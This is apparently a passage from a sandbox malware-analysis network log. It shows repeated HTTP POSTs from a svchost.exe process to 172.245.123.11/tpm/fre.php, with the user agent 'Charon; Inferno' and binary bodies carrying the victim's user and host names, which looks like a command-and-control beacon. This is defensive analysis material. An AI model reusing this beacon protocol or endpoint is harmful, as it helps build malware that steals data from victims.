Jan 7, 2025 11:02:44.019633055 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 11:02:44.522228003 CET	271	IN	HTTP/1.0 404 Not Found Date: Tue, 07 Jan 2025 10:02:44 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
69	192.168.2.5	49964	172.245.123.11	80	6784	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 11:02:44.679044962 CET	238	OUT	POST /tpm/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 172.245.123.11 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D3AFB906 Content-Length: 153 Connection: close
Jan 7, 2025 11:02:44.684154034 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 11:02:45.349988937 CET	271	IN	HTTP/1.0 404 Not Found Date: Tue, 07 Jan 2025 10:02:45 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
70	192.168.2.5	49969	172.245.123.11	80	6784	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 11:02:45.502561092 CET	238	OUT	POST /tpm/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 172.245.123.11 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D3AFB906 Content-Length: 153 Connection: close
Jan 7, 2025 11:02:45.507464886 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 11:02:46.029906034 CET	271	IN	HTTP/1.0 404 Not Found Date: Tue, 07 Jan 2025 10:02:45 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
71	192.168.2.5	49971	172.245.123.11	80	6784	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 11:02:46.175299883 CET	238	OUT	POST /tpm/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 172.245.123.11 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D3AFB906 Content-Length: 153 Connection: close
Jan 7, 2025 11:02:46.180114985 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 11:02:46.699381113 CET	271	IN	HTTP/1.0 404 Not Found Date: Tue, 07 Jan 2025 10:02:46 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
72	192.168.2.5	49976	172.245.123.11	80	6784	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 11:02:46.846402884 CET	238	OUT	POST /tpm/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 172.245.123.11 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D3AFB906 Content-Length: 153 Connection: close
Jan 7, 2025 11:02:46.851221085 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 11:02:47.374459028 CET	271	IN	HTTP/1.0 404 Not Found Date: Tue, 07 Jan 2025 10:02:47 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
73	192.168.2.5	49982	172.245.123.11	80	6784	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 11:02:47.790219069 CET	238	OUT	POST /tpm/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 172.245.123.11 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D3AFB906 Content-Length: 153 Connection: close
Jan 7, 2025 11:02:47.795110941 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 11:02:48.292709112 CET	271	IN	HTTP/1.0 404 Not Found Date: Tue, 07 Jan 2025 10:02:48 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
74	192.168.2.5	49987	172.245.123.11	80	6784	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 11:02:48.446213007 CET	238	OUT	POST /tpm/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 172.245.123.11 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D3AFB906 Content-Length: 153 Connection: close
Jan 7, 2025 11:02:48.451009035 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 11:02:49.000181913 CET	271	IN	HTTP/1.0 404 Not Found Date: Tue, 07 Jan 2025 10:02:48 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
75	192.168.2.5	49994	172.245.123.11	80	6784	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 11:02:49.145272017 CET	238	OUT	POST /tpm/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 172.245.123.11 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D3AFB906 Content-Length: 153 Connection: close
Jan 7, 2025 11:02:49.150118113 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 11:02:49.647380114 CET	271	IN	HTTP/1.0 404 Not Found Date: Tue, 07 Jan 2025 10:02:49 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
76	192.168.2.5	50000	172.245.123.11	80	6784	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 11:02:49.802108049 CET	238	OUT	POST /tpm/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 172.245.123.11 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D3AFB906 Content-Length: 153 Connection: close
Jan 7, 2025 11:02:49.806912899 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 11:02:50.327389956 CET	271	IN	HTTP/1.0 404 Not Found Date: Tue, 07 Jan 2025 10:02:50 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
77	192.168.2.5	50006	172.245.123.11	80	6784	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 11:02:50.475929022 CET	238	OUT	POST /tpm/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 172.245.123.11 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D3AFB906 Content-Length: 153 Connection: close
Jan 7, 2025 11:02:50.480746031 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 11:02:51.066351891 CET	271	IN	HTTP/1.0 404 Not Found Date: Tue, 07 Jan 2025 10:02:50 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
78	192.168.2.5	50009	172.245.123.11	80	6784	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 11:02:51.206149101 CET	238	OUT	POST /tpm/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 172.245.123.11 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D3AFB906 Content-Length: 153 Connection: close
Jan 7, 2025 11:02:51.210959911 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 11:02:51.758467913 CET	271	IN	HTTP/1.0 404 Not Found Date: Tue, 07 Jan 2025 10:02:51 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
79	192.168.2.5	50015	172.245.123.11	80	6784	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 11:02:51.911526918 CET	238	OUT	POST /tpm/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 172.245.123.11 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D3AFB906 Content-Length: 153 Connection: close
Jan 7, 2025 11:02:51.916358948 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 11:02:52.460309982 CET	271	IN	HTTP/1.0 404 Not Found Date: Tue, 07 Jan 2025 10:02:52 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
80	192.168.2.5	50020	172.245.123.11	80	6784	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 11:02:52.613785028 CET	238	OUT	POST /tpm/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 172.245.123.11 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D3AFB906 Content-Length: 153 Connection: close
Jan 7, 2025 11:02:52.618643999 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 11:02:53.129738092 CET	271	IN	HTTP/1.0 404 Not Found Date: Tue, 07 Jan 2025 10:02:53 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
81	192.168.2.5	50026	172.245.123.11	80	6784	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 11:02:53.268292904 CET	238	OUT	POST /tpm/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 172.245.123.11 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D3AFB906 Content-Length: 153 Connection: close
Jan 7, 2025 11:02:53.273171902 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 11:02:53.777441978 CET	271	IN	HTTP/1.0 404 Not Found Date: Tue, 07 Jan 2025 10:02:53 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
82	192.168.2.5	50032	172.245.123.11	80	6784	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 11:02:53.931938887 CET	238	OUT	POST /tpm/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 172.245.123.11 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D3AFB906 Content-Length: 153 Connection: close
Jan 7, 2025 11:02:53.936803102 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 11:02:54.694585085 CET	271	IN	HTTP/1.0 404 Not Found Date: Tue, 07 Jan 2025 10:02:54 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Jan 7, 2025 11:02:54.695349932 CET	271	IN	HTTP/1.0 404 Not Found Date: Tue, 07 Jan 2025 10:02:54 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
83	192.168.2.5	50038	172.245.123.11	80	6784	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 11:02:55.166923046 CET	238	OUT	POST /tpm/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 172.245.123.11 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D3AFB906 Content-Length: 153 Connection: close
Jan 7, 2025 11:02:55.171758890 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 11:02:55.670371056 CET	271	IN	HTTP/1.0 404 Not Found Date: Tue, 07 Jan 2025 10:02:55 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
84	192.168.2.5	50044	172.245.123.11	80	6784	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 11:02:55.824816942 CET	238	OUT	POST /tpm/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 172.245.123.11 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D3AFB906 Content-Length: 153 Connection: close
Jan 7, 2025 11:02:55.829664946 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 11:02:56.378081083 CET	271	IN	HTTP/1.0 404 Not Found Date: Tue, 07 Jan 2025 10:02:56 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
85	192.168.2.5	50050	172.245.123.11	80	6784	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 11:02:56.552958965 CET	238	OUT	POST /tpm/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 172.245.123.11 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D3AFB906 Content-Length: 153 Connection: close
Jan 7, 2025 11:02:56.557892084 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 11:02:57.059457064 CET	271	IN	HTTP/1.0 404 Not Found Date: Tue, 07 Jan 2025 10:02:56 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
86	192.168.2.5	50055	172.245.123.11	80	6784	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 11:02:57.229439974 CET	238	OUT	POST /tpm/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 172.245.123.11 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D3AFB906 Content-Length: 153 Connection: close
Jan 7, 2025 11:02:57.234365940 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 11:02:57.746912003 CET	271	IN	HTTP/1.0 404 Not Found Date: Tue, 07 Jan 2025 10:02:57 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
87	192.168.2.5	50061	172.245.123.11	80	6784	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 11:02:57.900012016 CET	238	OUT	POST /tpm/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 172.245.123.11 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D3AFB906 Content-Length: 153 Connection: close
Jan 7, 2025 11:02:57.904891014 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 11:02:58.413503885 CET	271	IN	HTTP/1.0 404 Not Found Date: Tue, 07 Jan 2025 10:02:58 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
88	192.168.2.5	50066	172.245.123.11	80	6784	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
